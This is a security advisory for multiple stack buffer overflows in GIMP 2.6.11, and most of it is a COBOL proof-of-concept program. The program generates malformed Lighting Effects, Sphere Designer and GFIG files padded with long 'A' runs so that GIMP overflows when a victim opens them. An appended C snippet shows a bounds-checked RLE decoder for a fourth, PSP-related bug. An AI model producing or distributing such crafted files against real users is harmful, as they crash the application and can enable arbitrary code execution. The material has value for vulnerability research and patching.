source: https://www.securityfocus.com/bid/45647/info
GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
GIMP 2.6.11 is vulnerable; other versions may also be affected.
000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR. NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION. 43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100 ORGANIZATION IS LINE SEQUENTIAL.
000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120 ORGANIZATION IS LINE SEQUENTIAL.
000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140 ORGANIZATION IS LINE SEQUENTIAL.
000150*FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5 PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE PIC X(29) VALUE 'BrushName:Circle (11)'.
000520 01 TEXV-OUTF PIC X(29) VALUE 'PaintType: 1'.
000530 01 TEXV-OUTG PIC X(29) VALUE 'FillType: 0'.
000540 01 TEXV-OUTH PIC X(29) VALUE 'FillOpacity:100'.
000550 01 TEXV-OUTI PIC X(29) VALUE 'Pattern:Pine'.
000560 01 TEXV-OUTJ PIC X(29) VALUE 'Gradient:FG to BG (RGB)'.
000570 01 TEXV-OUTK PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000645* AFTER ADVANCING 0 LINES APPENDS THE NEXT RECORD TO THE SAME LINE,
000646* SO THE 'A' RUNS ARE GLUED ONTO THE "Position:" VALUE.
000650     OPEN OUTPUT FILE01.
000660     WRITE PRINTLINE FROM TEXT-OUT1.
000670     WRITE PRINTLINE FROM TEXT-OUT2.
000680     WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690     WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700     WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710     WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720     WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730     WRITE PRINTLINE FROM TEXT-OUT5.
000740     WRITE PRINTLINE FROM TEXT-OUT6.
000750     WRITE PRINTLINE FROM TEXT-OUT7.
000760     WRITE PRINTLINE FROM TEXT-OUT8.
000770     CLOSE FILE01.
000780
000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800     OPEN OUTPUT FILE02.
000810     WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120     WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130     WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140     WRITE QRINTLINE FROM TEXU-OUT3.
001150     CLOSE FILE02.
001160
001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
001180     OPEN OUTPUT FILE03.
001190     WRITE RRINTLINE FROM TEXV-OUT1.
001200     WRITE RRINTLINE FROM TEXV-OUT2.
001210     WRITE RRINTLINE FROM TEXV-OUT3.
001220     WRITE RRINTLINE FROM TEXV-OUT4.
001230     WRITE RRINTLINE FROM TEXV-OUT5.
001240     WRITE RRINTLINE FROM TEXV-OUT6.
001250     WRITE RRINTLINE FROM TEXV-OUT7.
001260     WRITE RRINTLINE FROM TEXV-OUT8.
001270     WRITE RRINTLINE FROM TEXV-OUT9.
001280     WRITE RRINTLINE FROM TEXV-OUTA.
001290     WRITE RRINTLINE FROM TEXV-OUTB.
001300     WRITE RRINTLINE FROM TEXV-OUTC.
001310     WRITE RRINTLINE FROM TEXV-OUTD.
001320     WRITE RRINTLINE FROM TEXV-OUTE.
001330     WRITE RRINTLINE FROM TEXV-OUTF.
001340     WRITE RRINTLINE FROM TEXV-OUTG.
001350     WRITE RRINTLINE FROM TEXV-OUTH.
001360     WRITE RRINTLINE FROM TEXV-OUTI.
001370     WRITE RRINTLINE FROM TEXV-OUTJ.
001380     WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390     WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400     WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410     WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420     WRITE RRINTLINE FROM TEXV-OUTL.
001430     WRITE RRINTLINE FROM TEXV-OUTM.
001440     WRITE RRINTLINE FROM TEXV-OUTN.
001450     CLOSE FILE03.
001460
001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480*OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490*STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500*ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520*HAPPY NEW YEAR!!! http://rock-madrid.com/
001530
001540     STOP RUN.
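The fourth bug in the comment above is a run-length decoder that trusts the run count in the file. The following is an added illustration written for this page, not GIMP's file-psp.c code; it assumes a simplified PackBits-style encoding (a count byte above 128 repeats the next byte count - 128 times, otherwise that many literal bytes follow) and shows the bounds check that rejects a run longer than the space left in the output row instead of writing past it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Illustrative PackBits-style RLE row decoder (not GIMP's file-psp.c).
 * Assumed encoding: a count byte > 128 repeats the next byte (count - 128)
 * times; a count byte <= 128 copies that many literal bytes. */
typedef enum { RLE_OK = 0, RLE_ERR_TRUNCATED = 1, RLE_ERR_OVERRUN = 2 } rle_status;

rle_status decode_rle_checked(const uint8_t *in, size_t in_len,
                              uint8_t *out, size_t out_len, size_t *written)
{
    size_t ip = 0, op = 0;
    while (ip < in_len) {
        unsigned int n = in[ip++];
        if (n > 128) {
            unsigned int run = n - 128;
            if (ip >= in_len) return RLE_ERR_TRUNCATED;
            /* a run that does not fit in the remaining output is rejected
             * here rather than written beyond the buffer */
            if (run > out_len - op) return RLE_ERR_OVERRUN;
            memset(out + op, in[ip++], run);
            op += run;
        } else {
            if (n > in_len - ip) return RLE_ERR_TRUNCATED;
            if (n > out_len - op) return RLE_ERR_OVERRUN;
            memcpy(out + op, in + ip, n);
            ip += n;
            op += n;
        }
    }
    *written = op;
    return RLE_OK;
}

/* Constructed samples decoded into an 8-byte row. The second one ends with a
 * run claiming 100 pixels when only 5 remain, the pattern the advisory names. */
static const uint8_t SAMPLE_OK[]  = { 3, 'a', 'b', 'c', 128 + 4, 'x' };
static const uint8_t SAMPLE_BAD[] = { 3, 'a', 'b', 'c', 128 + 100, 'x' };

int decode_sample(const uint8_t *in, size_t in_len, size_t *written)
{
    uint8_t row[8];
    return decode_rle_checked(in, in_len, row, sizeof row, written);
}
size_t decode_ok_len(void)  { size_t w = 0; decode_sample(SAMPLE_OK, sizeof SAMPLE_OK, &w); return w; }
int decode_ok_status(void)  { size_t w; return decode_sample(SAMPLE_OK, sizeof SAMPLE_OK, &w); }
int decode_bad_status(void) { size_t w; return decode_sample(SAMPLE_BAD, sizeof SAMPLE_BAD, &w); }
```

The well-formed sample decodes to 7 bytes; the malformed one is refused with RLE_ERR_OVERRUN before any byte of the oversized run is written.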